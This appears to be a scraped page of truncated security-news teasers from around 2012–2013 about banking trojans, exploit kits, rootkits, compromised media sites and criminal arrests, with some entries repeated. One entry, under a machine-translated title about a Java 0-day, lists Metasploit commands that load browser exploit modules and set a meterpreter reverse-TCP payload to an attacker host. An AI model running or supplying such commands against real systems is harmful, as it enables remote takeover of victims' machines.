New ZeuS Malware spreading automatically via USB Flash Drives

The notorious Zeus Trojan, a family of banking malware known for stealing passwords and draining the accounts of its victims, has steadily increased in recent months. The malware family itself is frequently updated with mechanisms designed to evade detection by antivirus and network security...

Cool Exploit Kit Includes Old Internet Explorer Exploit

You cannot accuse the keepers of the Cool Exploit Kit of not recognizing market trends. Given a rash of recent watering hole attacks and zero-day exploits built around Microsoft’s Internet Explorer browser, it’s no surprise that a 15-month-old IE exploit has been included in the crimeware package...

Hacked Media Sites Serving Fake AV Malware

Websites belonging to a number of Washington, D.C.-area media outlets have been compromised in a series of opportunistic attacks with criminals using a watering-hole tactic to spread scareware, or phony antivirus software. Popular D.C. radio station WTOP, sister station Federal News Radio, and th...

New Apache backdoor serving Blackhole exploit kit

A new sophisticated and stealthy Apache backdoor meant to drive traffic to malicious websites serving Blackhole exploit kit widely has been detected by Sucuri recently. Researchers claimed that this backdoor affecting hundreds of web servers right now. Dubbed Linux/Cdorked.A, one of the most...

New Apache backdoor serving Blackhole exploit kit

A new sophisticated and stealthy Apache backdoor meant to drive traffic to malicious websites serving Blackhole exploit kit widely has been detected by Sucuri recently. Researchers claimed that this backdoor affecting hundreds of web servers right now. Dubbed Linux/Cdorked.A, one of the most...

Researchers detected the Malware that targets the Russian stock-trading platform QUIK

Security Researcher from Group-IB Group-IB is one of the leading companies in global cybercrime prevention and hi-tech crime investigations has found a new kind of malware that targets the Russian stock-trading platform QUIK. It was detected during several targeted attacks starting in November 20...

Hunting Russian malware author behind Phoenix Exploit Kit

Exploit kits are one of the dangerous cyber crime tool, where The Phoenix Exploit Kit is a good example of exploit packs used to exploit vulnerable software on the computers of unsuspecting Internet users. The Phoenix Exploit Kit is available for a base price of $2,200 in underground market by it...

Hunting Russian malware author behind Phoenix Exploit Kit

Exploit kits are one of the dangerous cyber crime tool, where The Phoenix Exploit Kit is a good example of exploit packs used to exploit vulnerable software on the computers of unsuspecting Internet users. The Phoenix Exploit Kit is available for a base price of $2,200 in underground market by it...

NBC Website Hacked, Leading Visitors to Citadel Banking Malware

Another day, another media company hacked. This time it’s NBC which has fallen to victim hackers on the heels of compromises of the New York Times and Wall Street Journal websites. Various experts have confirmed that NBC’s website is compromised and leading visitors to the dangerous Citadel banki...

Zeus banking Trojan targeting five major banks in Japan

Zeus continues to strike online bank accounts and users, and technology designed to thwart these Trojan attacks continually fails to keep up. Symantec recently came across a new Zeus file targeting five major banks in Japan. The malware, which has caused serious problems to banking customers in...

Group behind largest Ransomware campaign arrested by Spanish police

Police in Spain have arrested a gang of 11 cyber criminals who used ransomware to demand money from thousands of victims in 30 countries using malware known as Reveton. Police arrested six Russians, two Ukrainians and two Georgians in the Costa del Sol. The gang leader, a 27-year-old Russian, was...

Zeus banking Trojan targeting five major banks in Japan

Zeus continues to strike online bank accounts and users, and technology designed to thwart these Trojan attacks continually fails to keep up. Symantec recently came across a new Zeus file targeting five major banks in Japan. The malware, which has caused serious problems to banking customers in...

Group behind largest Ransomware campaign arrested by Spanish police

Police in Spain have arrested a gang of 11 cyber criminals who used ransomware to demand money from thousands of victims in 30 countries using malware known as Reveton. Police arrested six Russians, two Ukrainians and two Georgians in the Costa del Sol. The gang leader, a 27-year-old Russian, was...

ADP-Themed Phishing Emails Lead to Blackhole Sites

Scammers are spamming out malicious emails purporting to come from payroll processing company ADP, according Dancho Danchev of Webroot. The emails arrive under the subject line “ADP Immediate Notifications” and contain links to compromised websites hosting the latest iteration of the Blackhole...

The New Year initial, Java break first 0day-vulnerability warning-the black bar safety net

1 1: The 0 0 UPDATE: MSF has been updated related to penetration testing module use exploit/windows/browser/iecbuttonuaf use exploit/multi/browser/javajre17jmxbean set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reversetcp set LHOST 192.168.178.26 exploit sysinfo getuid Mo...

New Apache Exploit Doling Out Zeus, Sweet Orange Exploit Kit

UPDATE – A new Apache module, Linux/Chapro.A, is making the rounds, injecting malicious content including a popular Zeus variant into web pages. The module was discussed in a blog on ESET’s Threat Blog by the company’s Security intelligence Program Manager, Pierre-Marc Bureau. According to the...

Sweet Orange Exploit Kit Offers Customers Higher Infection Rates

The newly emerging Sweet Orange Exploit Kit boasts a 10 to 25 percent infection rate and is promising to drive 150,000 unique visitors per day to the websites of its customers, according to Jeff Doty and Chris Larsen of Blue Coat Security. If the claims of Sweet Orange’s authors reflect reality, ...

Necurs Rootkit infect 83,427 machines in November

Rootkit named as "Necurs" infect 83,427 unique machines during the month of November 2012. It is a multi-purpose rootkits capable of posing a threat to both 32 and 64-bit Windows systems. Distributed via drive-by download on the websites that host the BlackHole exploit kit. Like other rootkits it...

Necurs Rootkit Infections Way Up

Infections from a nasty bit of malware, generally delivered by the Black Hole Exploit Kit, surged in November, hitting more than 83,000 machines. Microsoft’s Malware Protection Center rates the Necurs rootkit threat as severe. Dubbed a rootkit by Kaspersky Lab, Necurs has many dimensions to it...

Chrome Playing Hard to Get with Blackhole Exploit Kit

Google’s Chrome browser is something of a tough customer for the infamous and widely deployed Blackhole Exploit Kit, according to Blue Coat security researcher, Adnan Shukor. Shukor notes there has been an uptick in the kit’s use of plain HTML files, instead of iframes, to redirect users to explo...